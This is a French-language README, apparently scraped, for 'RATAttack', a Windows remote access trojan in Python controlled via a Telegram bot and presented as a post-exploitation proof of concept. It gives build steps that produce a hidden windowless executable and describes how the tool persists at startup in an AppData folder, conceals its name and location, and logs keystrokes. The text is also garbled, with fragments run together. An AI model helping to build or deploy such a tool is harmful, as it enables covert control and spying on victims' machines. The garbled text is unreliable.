
Outil de post-exploitation à distance pour Windows via Telegram
Outil de post-compromission Windows à distance via Telegram (Python 2.7), Créé à l'origine par Ritiek, forké et modifié par mvrozanti puis par moi-même.
Le but même de cet outil est de démontrer (en tant que « PoC ») le contrôle d'une machine déjà compromise, via Telegram. Comme pour mes outils déjà écrits, je ne promeus pas d'activités illégales.
Cette version modifiée utilise la bot API v2 de Telegram, au lieu de la v1 traditionnelle. Le changement principal est l'utilisation de boutons clavier au lieu de la saisie de texte. J'essaierai d'ajouter de nouvelles fonctionnalités, de corriger les bogues et d'être compatible avec l'API v3, après avoir ajouté les changements nécessaires de "mvrozanti". En attendant, les commandes cd, download, upload, run et delete ne fonctionneront pas.

file au bot TelegramLes outils d'administration à distance actuels sur le marché rencontrent 2 problèmes majeurs :
Ce RAT surmonte ces deux problèmes en utilisant la bot API de Telegram.
BotFather.pip install -r requirements.txt.64-bit ou 32-bit selon votre système.
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.pip install pyHook-1.5.1-cp27-cp27m-win32.whl.python RATAttack.py.chat_id depuis la console, remplacez-le dans le script et commentez la ligne return True. Ne vous inquiétez pas, vous comprendrez en lisant les commentaires dans le script.
RATAttack sera créé dans votre répertoire de travail, contenant et tous les fichiers que vous envoyez au bot.Remplacez votre chemin dans compileAndRun.bat (l'exécuter lancera réellement l'exécutable)
Exécutez `pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`. Vous pouvez aussi passer `--icon=<path\to\icon.ico>` pour utiliser une icône personnalisée.
.exe dans C:\Python27\Scripts\dist\. Vous pouvez changer le nom du .exe comme vous le souhaitez..exe compilé, le script se cachera et infectera votre PC pour s'exécuter au démarrage. Vous pouvez revenir à la normale en utilisant l'option /self_destruct ou en supprimant manuellement le répertoire C:\Users\Username\AppData\Roaming\Portal et C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk (bien que je recommande de les supprimer manuellement pour le moment)..exe caché ainsi que l'emplacement et le nom du dossier où le .exe caché se dissimulera. Pour ce faire, modifiez respectivement compiled_name et hide_folder.The MIT License
keylogs.txt